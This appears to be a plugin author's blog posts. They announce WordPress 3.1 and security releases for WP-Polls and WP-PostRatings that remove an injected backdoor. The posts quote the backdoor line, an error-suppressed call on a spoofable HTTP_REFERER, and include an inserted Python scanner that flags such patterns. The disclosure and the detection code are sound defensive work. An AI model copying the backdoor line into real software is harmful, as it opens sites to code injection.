WordPress 3.1 is finally out! With regards to my plugins' compatibility with WordPress 3.1, I have not had the chance to test it. I will be doing it soon =)
The long-awaited fourteenth release of WordPress is now available. WordPress 3.1 “Django” is named in honor of the jazz guitarist Django Reinhardt. Version 3.1 is available for download, or you can update from within your dashboard.
This release features a lightning fast redesigned linking workflow which makes it easy to link to your existing posts and pages, an admin bar so you’re never more than a click away from your most-used dashboard pages, a streamlined writing interface that hides many of the seldom-used panels by default to create a simpler and less intimidating writing experience for new bloggers (visit Screen Options in the top right to get old panels back), and a refreshed blue admin scheme available for selection under your personal options.
There’s a bucket of candy for developers as well, including our new Post Formats support which makes it easy for themes to create portable tumblelogs with different styling for different types of posts, new CMS capabilities like archive pages for custom content types, a new Network Admin, an overhaul of the import and export system, and the ability to perform advanced taxonomy and custom fields queries.
With the 3.1 release, WordPress is more of a CMS than ever before. The only limit to what you can build is your imagination.
(No video yet for 3.1, we’re going to add it later.)
By the Numbers
There were over two thousand commits to the codebase in the 3.1 cycle! For a more comprehensive look at everything that has improved in 3.1, check out 3.1’s Codex page or the more than 820 closed issues in Trac.
Now is the time to drop by our development channels if you are interested in being involved with 3.2, as the agenda will be under discussion shortly. We’re hoping to get the 3.2 release out in a shorter development cycle (3.1 took too long) and include some fun improvements around plugins and the speed of the admin. (Don’t worry, we’re still planning on using PHP.)
We’re All in This Together
WordPress is the result of the combined effort of people from all over the world united with a common goal: to make the best darn web software for publishing your story on the web and sharing it with the world. There are more than 180 people who helped out with development during the 3.1 cycle
Download: WordPress 3.1
WP-PostViews 1.60 is released which fixes form submit issues on WPMU installation, and now there is a “Views” column on the Edit Posts page. Of course similar to WP-Polls and WP-PostRatings, I have updated readme.txt to be a proper readme now.
Download: WP-PostViews 1.60
I have released 2 security updates to WP-Polls and WP-PostRatings which basically remove malicious code that allows code injection.
The malicious code is as follows:
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection, and note the @ sign which suppresses all errors and hence the error will not be displayed.
I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.
- Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
- I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
- The above changeset is for trunk. However in my readme.txt, I have stated that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file.
- If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
- For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
- For WP-WAP, there are almost 2 suspicious commits, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it.
I am going to review all my commits to the SVN to ensure that there is no more suspicious code being added.
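An audit of the kind described above, sketched as an added example (not code from the plugin author or from WordPress): it flags PHP call sites that receive request-controlled input and marks those hidden behind the @ operator, which is the shape of the quoted statement. The names scan_php, scan_tree and SAMPLE are hypothetical, and the matching is a line-based heuristic that does not follow calls split across lines or input copied into variables first.

```python
import re
from pathlib import Path

# Request-controlled PHP inputs: HTTP_* request headers and the request superglobals.
TAINTED = re.compile(
    r"""\$_SERVER\[\s*['"]HTTP_[A-Z_]+['"]\s*\]|\$_(?:GET|POST|COOKIE|REQUEST)\b""")
# A call site, optionally prefixed with PHP's @ error-suppression operator.
CALL = re.compile(r"(@?)\s*\b([A-Za-z_]\w*)\s*\(")
# Control keywords and read-only checks that would only add noise.
IGNORED = {"if", "elseif", "while", "isset", "empty", "array"}

def call_args(line, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(line)):
        depth += {"(": 1, ")": -1}.get(line[i], 0)
        if depth == 0:
            return line[open_idx + 1:i]
    return line[open_idx + 1:]  # unbalanced on this line: take the rest

def scan_php(source, name="<memory>"):
    """Flag calls that receive request-controlled input; note @-suppressed ones."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL.finditer(line):
            if m.group(2) in IGNORED:
                continue
            if TAINTED.search(call_args(line, m.end() - 1)):
                findings.append((name, lineno, m.group(2), m.group(1) == "@"))
    return findings

def scan_tree(root):
    """Run scan_php over every .php file below root (e.g. a plugin checkout)."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        hits += scan_php(path.read_text(errors="replace"), str(path))
    return hits

# Constructed sample; line 4 is the statement quoted in the post.
SAMPLE = """<?php
// constructed sample file
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
    echo intval($_GET['id']);
"""

if __name__ == "__main__":
    for name, lineno, func, suppressed in scan_php(SAMPLE, "sample.php"):
        level = "HIGH (@-suppressed)" if suppressed else "review"
        print(f"{name}:{lineno}: {func}() receives request input [{level}]")
```

Unsuppressed hits such as the intval() call are triage candidates rather than findings; the @-suppressed ones are the hits to read first.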
I have released WP-PostRatings 1.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-PostRatings 1.50 only. This is the same code injection fixed for WP-Polls a few days back.
I have checked the rest of my plugins to ensure that the code is not in any more of my plugins. Sorry for any inconvenience caused.
Similar to WP-Polls, I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-PostRatings right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.
All users should upgrade now
Props to Dion Hulse aka dd32 for the report!
Download: WP-PostRatings 1.61
I have released WP-Polls 2.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-Polls 2.60 only.
I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-Polls right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.
All users should upgrade now
Vulnerability discovered by + Props to:
Dweeks, Leon Juranic and Chad Lavoie of the Swiftwill Security Team (www.swiftwill.com)
Download: WP-Polls 2.61